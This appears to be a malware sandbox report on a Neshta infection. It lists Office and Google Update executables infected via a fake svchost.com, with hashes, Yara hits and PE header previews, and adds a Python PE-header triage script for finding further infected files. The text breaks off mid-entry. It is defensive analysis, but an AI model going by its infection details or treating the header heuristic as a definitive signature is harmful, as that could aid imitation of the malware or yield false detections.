                                                                                                                        SHA-512:71235707D208BEA37FA95A5BD5EF10F768740621008A50B3E440C70B86039AC2428E8B7105A93921DD8DF659AD35C36BB4BFA2C922335680CC1660B48FD54B4A
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.461871956296466
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCqi4IvHjjWhQmgBhtV+mLtiqdSo:sr85CqThgpLTso
                                                                                                                        MD5:CE04DA14A0724F9E950D41F9B2CC1643
                                                                                                                        SHA1:EFF607BAD3A4CB05CC38065E45DC61555618A060
                                                                                                                        SHA-256:D90265A2653E732290DD6617ADD54CA1B2981481AE6B6C18C570D4552C84E826
                                                                                                                        SHA-512:6E548630AF301C8F472BACCB487C31E7E4092E3B25F439D585F36F0A24846C6C0F4A3AF34BE25389D9B9FDF6C1A03A9A8106F9FD777BFB4D1F824A29844E5803
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):5.119504084682648
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJxqs0y0gqotvngnYkJZZZZZZZZZZZZZz:JxqjQ+P04wsmJC2L4Y4YkvJt
                                                                                                                        MD5:EF92B40044CB210120E9889CA1DC1D5C
                                                                                                                        SHA1:EEDCB5BA7F70F04C3D25AD321C93F978E5E1C7A8
                                                                                                                        SHA-256:016D35F82750ECF792D64A6CFF5D376DB69F2BA1D30BEF80978CCBE84ACFFD0B
                                                                                                                        SHA-512:DBB2EC69392CFFA9ABC8EB0E2C979E5CD4F6A806E14D53F87E8D041E7F0D25816D13363FA66F97FB93DABA8E5CBB17D617029A87BBB31CDECE9A48745E321062
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):4.799951544005101
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJbR+QDxQPcfwBOB6ZZZZZZZZZZZZZbJO:JxqjQ+P04wsmJCC+WxQ0lEJRaCA
                                                                                                                        MD5:7078371E0D358B86D46D6CF87987C8CD
                                                                                                                        SHA1:6F58E6F33BB9242034F7C6CDCF17B637C060C8BA
                                                                                                                        SHA-256:2DE937273CBFE6AA5909EFD083FFE477DC7CF37739F12923E2B2FB1B1B6E17B1
                                                                                                                        SHA-512:13449BFDB7AABDC75EC51F1FCB5FE95761C22E3F9E4D1A1CBB5BFC0A3F8FE2AB2FDC3ACD0BAA0D5BADDF0CD0DB390788C60B9C664C3E3FDCC29537347B83E4EF
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.05148718063145
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCPkMrdYJnRQV6J4tuw62roH5lL1u:sr85C9rsRQIouwjQlL
                                                                                                                        MD5:D4B144B9963B3114F1D938F44200AE62
                                                                                                                        SHA1:F14C2F8BD9BD0CAC7A682D453C58B99858D6C0CE
                                                                                                                        SHA-256:CB49C8EA020EABA89BB5032060928901AA90BA2530CD5D5467D15AAB489747DA
                                                                                                                        SHA-512:80D70AAF806C46388447A4BF0DF9A98C7DBC211E290A60F3A30C560E09BF12BBDCDABB4DA0B945A8144CBE8D2B22CD4F0D9AFF4DBC33E8FBCB7DAA8244CEDA95
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
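Every dropped file above shares the same Preview bytes (the Borland/Delphi "MZP" DOS magic, the "This program must be run under Win32" stub message, an i386 PE header and the section order CODE, DATA, BSS, .idata, .tls, .rdata, .reloc, .rsrc) and the same 82944-byte size, while the MD5/SHA values differ for each file. The following triage helper is an added example, not code from the Joe Sandbox report or from the malware, and the function names, the constructed sample inputs and the `build_sample_pe` helper are this example's own. It parses just enough of a PE header to compare a file against that layout so an analyst can sweep a host for further infected executables beyond the paths the sandbox happened to list. The check is a heuristic for a Delphi-linked i386 PE, not a Neshta signature: any hit should be confirmed with the MAL_Neshta_Generic Yara rule cited in the report before remediation.

```python
"""Added triage helper (not part of the Joe Sandbox report or of Neshta):
parse the PE header of candidate files and flag those whose DOS stub and
section table match the layout shown in the Preview lines above."""
import hashlib
import struct
from dataclasses import dataclass
from pathlib import Path
from typing import Iterable, List, Optional, Tuple

# Layout visible in every Preview line of the dropped files: Borland/Delphi
# 'MZP' magic, the Win32 stub message, and this exact section order.
PREVIEW_SECTIONS = ["CODE", "DATA", "BSS", ".idata", ".tls", ".rdata", ".reloc", ".rsrc"]
DELPHI_STUB_MSG = b"This program must be run under Win32"
IMAGE_FILE_MACHINE_I386 = 0x014C            # the 'L' after "PE.." in the preview
REPORTED_DROPPED_SIZE = 82944               # Size (bytes) of every infected file listed


@dataclass
class PeHeaderInfo:
    dos_magic: bytes          # first three bytes, e.g. b"MZP"
    has_delphi_stub: bool     # stub message present before the NT headers
    machine: int
    sections: List[str]
    size: int
    sha256: str


def parse_pe_header(data: bytes) -> Optional[PeHeaderInfo]:
    """Recover magic, machine type and section names from a PE image.
    Returns None for anything that is not a well-formed PE header."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    table = e_lfanew + 24 + opt_size           # section table follows the optional header
    names = []
    for i in range(nsections):
        off = table + 40 * i
        if off + 40 > len(data):
            return None                        # truncated section table
        names.append(data[off:off + 8].split(b"\0", 1)[0].decode("latin-1"))
    return PeHeaderInfo(data[:3], DELPHI_STUB_MSG in data[:e_lfanew], machine,
                        names, len(data), hashlib.sha256(data).hexdigest())


def matches_preview_layout(info: PeHeaderInfo) -> bool:
    """Heuristic only: any Delphi-linked i386 PE with these sections matches,
    so confirm hits with the MAL_Neshta_Generic Yara rule before acting."""
    return (info.dos_magic == b"MZP" and info.has_delphi_stub
            and info.machine == IMAGE_FILE_MACHINE_I386
            and info.sections == PREVIEW_SECTIONS)


def triage(blobs: Iterable[Tuple[str, bytes]]) -> List[dict]:
    """Return one record per (name, bytes) pair whose header matches the layout."""
    hits = []
    for name, data in blobs:
        info = parse_pe_header(data)
        if info and matches_preview_layout(info):
            hits.append({"path": name, "size": info.size, "sha256": info.sha256,
                         "size_matches_report": info.size == REPORTED_DROPPED_SIZE})
    return hits


def scan_directory(root: Path) -> List[dict]:
    """Disk front-end: feed every regular file under root to triage()."""
    def blobs():
        for p in root.rglob("*"):
            if p.is_file():
                try:
                    yield str(p), p.read_bytes()
                except OSError:
                    continue
    return triage(blobs())


# --- constructed sample input: PE-shaped byte strings, not real dropped files ---
def build_sample_pe(dos_magic3: bytes, stub_msg: bytes, section_names: List[str],
                    machine: int = IMAGE_FILE_MACHINE_I386, total_size: int = 4096) -> bytes:
    """Minimal, non-executable PE header with the requested magic, stub and sections."""
    e_lfanew, opt_size = 0x100, 0xE0           # PE32 optional header size
    dos = bytearray(e_lfanew)
    dos[0:3] = dos_magic3
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    dos[0x40:0x40 + len(stub_msg)] = stub_msg
    file_hdr = struct.pack("<HHIIIHH", machine, len(section_names), 0, 0, 0, opt_size, 0x0102)
    opt_hdr = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    sections = b"".join(
        n.encode().ljust(8, b"\0")
        + struct.pack("<IIIIIIHHI", 0x1000, 0x1000 * (i + 1), 0x200, 0x400 + 0x200 * i,
                      0, 0, 0, 0, 0x60000020)
        for i, n in enumerate(section_names))
    return (bytes(dos) + b"PE\0\0" + file_hdr + opt_hdr + sections).ljust(total_size, b"\0")


if __name__ == "__main__":
    samples = [
        ("infected_like.exe", build_sample_pe(b"MZP", DELPHI_STUB_MSG, PREVIEW_SECTIONS)),
        ("msvc_like.exe", build_sample_pe(b"MZ\x90", b"This program cannot be run in DOS mode.",
                                          [".text", ".rdata", ".data", ".reloc"])),
    ]
    for hit in triage(samples):
        print(hit)
```

On a live host, `scan_directory(Path(r"C:\Program Files (x86)"))` returns one record per match with its SHA-256, so the hashes of files the sandbox did not list can be added to the blocklist; the per-file hashes in the report cannot be reused for that because, as the identical Preview lines with differing MD5/SHA values show, the infected files agree only in their leading bytes.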
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.365915780903398
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC+rie7lHfYdCtBzNKxmtshDucWs/7VOb88sirz:sr85C+rN7btBAxm2Z/ps/rz
                                                                                                                        MD5:43B8EBCCF6312172AF0638D6EA2E9A4B
                                                                                                                        SHA1:C628EBF5D72FDA6B9BE07CB69312472906E1143B
                                                                                                                        SHA-256:B42F96D408CFDB35545C5900EC0E8AE72B85FC960DC4BDBDEFD0B6A4BF3A49C3
                                                                                                                        SHA-512:773A5C800CA9EE738A6152D0B9B6F1CFC410407F95CA84D72951C4D8BFE914659FD66892A927174278BA77B5190BF74B98B806E6A78AAAE2D70277345AEAFC4C
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.420838658743323
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCVNAa6ZUmWtWHpy7+OAqbrefMSy8A:sr85CVNB6zLy79b8A
                                                                                                                        MD5:58473BD19292BBBB9CE1C6BFAE872648
                                                                                                                        SHA1:D9B5084A65CF3C039D51AE4F1C39C7E5DD83DBCC
                                                                                                                        SHA-256:328E9B6CE1A7D1B4B8B602F1A2D61C56BF85CEC9293C55C047584937C9390C3D
                                                                                                                        SHA-512:E0A19F3C91BC3433D5AD83C78135346769889BA06EB56F92AE3137CB7769582BA5F6139524EEFFE238B67CDA3BCC8854F2E59283E60D23BD555DEB6152310872
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.364257425575085
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCRtWit2d+BkpzTscsot7h:sr85CRtWo2Q+ycsAh
                                                                                                                        MD5:9180D3CEE013A6DE40DD963A16951734
                                                                                                                        SHA1:18E74AD691F4448AA451FBE5AB7D374F24CB07B4
                                                                                                                        SHA-256:299E81E2FE407A151C56B24E904AA2B0B9C18F712A0B43E704034939AAD1B564
                                                                                                                        SHA-512:DBDE2F6EED630ADADC7F58FFA269DCFE2749F499B8C5DE0927DE47EFF55FB7B6A185B1323DA55307228D117629B79152638B129D92562ACCA208555E7105F9EF
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.435519044418047
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCxKZg7inyp+gsnV3SNjDBII0DNC:sr85Cx4g7Ky1p7
                                                                                                                        MD5:E7868326F5EF4E85A0FBAEC678D13A2C
                                                                                                                        SHA1:7E57578EA08482DA52474EEB3960CD4407225A59
                                                                                                                        SHA-256:D702CB2F33424FDBCE4EF3CB5B2C0DA789758F4EA6A4AB772591F110369F90F4
                                                                                                                        SHA-512:F56B049C81F2433875840455C18FF972C848C4AE0F04CCFD5BBE5C2222A26680AF3B86A301F9886A84C8D4EAC8861786AAEE224278E96F85B999BF4DA7E3306D
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.278417014765199
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJBr+YKB8MXTVul6YekIfQzbL2Vo8/nXS:JxqjQ+P04wsmJCUyYKBRXM6PaGxZCP
                                                                                                                        MD5:4C6732F9F7CF89C1BC807F26552F0592
                                                                                                                        SHA1:9790303D2B8FD2C4DEC80D34C7E7D61081DDB03B
                                                                                                                        SHA-256:16A32ABF53E0246C49D984F31FA56B612A818BFA4FFF7681196DEC4F6343F19F
                                                                                                                        SHA-512:56D5EDE482CFE2DEFEE022CEB66EF839E9B47F33D8A270E060A729D70FF03F74A8C1699492C8C2BFB88B70483153C79A5890B31FEB3C7B3BCDB0AFC9D4FE59A7
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\Source user\OSE.EXE, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.254081989191424
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCbblZ1PNq9uCUOFVSiHdq+sxneZ:sr85Cbbr1Pg9uCRFRzsxeZ
                                                                                                                        MD5:C2C98501C8C0A38CB3B3D89B1CD09C67
                                                                                                                        SHA1:8D8469485BD3995DE34512BAC18DA482A31B5DC2
                                                                                                                        SHA-256:EFB24F3670542E6B491E3B9092E31E5068EDC2068C986F4D96E9F8176F6DCF26
                                                                                                                        SHA-512:10A42C069528EE8D55BE2106F2851B9E26AFEA5311D63D1CEDE860DB6B8E0252C3875422B047A9C6D35FC3D3F8409771A682B67C85CACF0A8D8A9352491FC3E0
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.565853286242963
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPwnvIu/+HCidGL0RYfqJfj+0xUYfQ76:JxqjQ+P04wsmJC6cQZo0xUFGh1SNcs8
                                                                                                                        MD5:2BE98153912196C9044AB31250DEAF28
                                                                                                                        SHA1:18487088B298B9E6B5E7FBDD00D5C37F2ED6AA78
                                                                                                                        SHA-256:47164473C9E34EC71472CB3516C4575D1C8A4484BE1308DD69AAD38CB84D03AD
                                                                                                                        SHA-512:20DB7DFC73249CE140DC3764D8A304A0CE080E9421751CA394829D0A57962D19A86C2A799CD0650DE14CD0CCF56BE887B63E696A9FB0F2D12994DDAB410CB662
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.517183428602308
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPgOCegc5f3E/lwvSHazYLO0K/rdiiA9:JxqjQ+P04wsmJCznxUOoQXALA
                                                                                                                        MD5:10CA92590C0A328CD9DD6B232AC5B97C
                                                                                                                        SHA1:CA9C9D94ACA6666E7655B9A7E3E11EAA23D84119
                                                                                                                        SHA-256:D6E3584260FE9CC093D4E7A33A66C201059296D5BBE30DFDFDD3AD76584192CD
                                                                                                                        SHA-512:5D78BA107880C8D8FACF61EA5C097705E6410C8D2AF8D6D49540B19FD2DDAB9177080B6435D30B9E3448C81DA4C85943456F93A4F3F549DEFD0794AFE85CAD59
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, Author: Florian Roth
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.31341198420156
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCMw0wAh3A5sWBMcdSJ+L94ltGTxv5ou:sr85CMuAt2Sk2m5ou
                                                                                                                        MD5:C5CBA627E9C4F07BF06013E2E19A2ADF
                                                                                                                        SHA1:B8678C954DE42C8D686384179EB1835E378C19E3
                                                                                                                        SHA-256:0215077B4DAAC5B17314C2A55673E2416ADAD7CD34E8C33AE748AE22C59A2CC5
                                                                                                                        SHA-512:234455B1C396B38DF98C569584C85CE153423CAC75E9E0DBCB724D9A0795FBCBE6D116185017535CC23ABAC49DCE9C77A9D8F470BE7B899E80C7C7E5086EE76F
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.571220400525005
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJC85J2AeSh8/J7YGzhc299YX:sr85CRgh2Bh1c27YX
                                                                                                                        MD5:2CE4DFB3663A6C0B5EA20EA10DECE139
                                                                                                                        SHA1:A9D39DDD39D9419D1B0A836E9110BC5E7CE071DA
                                                                                                                        SHA-256:006DC11C857D8EC872D4ECFB6CF70FB1BAB5C95AF8773BBEC11E07C2E0BEFC27
                                                                                                                        SHA-512:0F25FF89C156ED21AFB55F07BE74C8B290C9E42710A3AE3917CE2FEAEE3626FA20E26F1088CF47CC487B18C69E3A1A3B560A321F63EAAB9A3F478822B2B0F904
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.35638621946935
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ1jaG5lO8Ao+MJo1So6lSvUpRGaCJ9K7:JxqjQ+P04wsmJCwNbRu+2Hdt5yG10x
                                                                                                                        MD5:9AC378232CF66E98AC476EE00ACD8A6B
                                                                                                                        SHA1:ADDECA30D06C773A5C6D209646EC64DC0CDF3039
                                                                                                                        SHA-256:F3C6416304690DD5950F44E4721CE140B8932BE7C130204DEE2A623998F0F716
                                                                                                                        SHA-512:F14621706EF7E9E480A13E17B3A0764B93AE06EC6507C2401FC57D29D565397969A98091E373DF06A169C3005537A8E635610F1091AED5B64B8A22D9D253B46E
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.572547877647106
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCBeljakK11t5rL6Tfr/sVKQ7t:sr85CBkjtQVrY/0
                                                                                                                        MD5:FDB7DA820D2F539A317A598BA31067C8
                                                                                                                        SHA1:C9D147B854A2BB03D782A3BA1C645C525DA0EBD8
                                                                                                                        SHA-256:2D98E44BE09EDB2627AAB1A7AC69FF72CC7C06E24CA77B9F4C14A602B5DD78BB
                                                                                                                        SHA-512:6195C603856129DB9310484D0FD09AF788FDACFC468EC21C3F99E6BE7718AC491D6E001048492C3A67F811EABC062432DCF0EAAE175489B1A63A6CED1E8D8692
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, Author: Florian Roth
                                                                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
                                                                                                                        Process:C:\Windows\svchost.com
                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):82944
                                                                                                                        Entropy (8bit):6.571346004771877
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:1536:JxqjQ+P04wsmJCjpJaUWSZknGE7YGzh82dlYX:sr85CSsZmGkh182jYX
                                                                                                                        MD5:5BC82420D22E028C2481B8150AD4F793
                                                                                                                        SHA1:9DE41D3BA5DBF3DC259110C5C34E216315DFD327
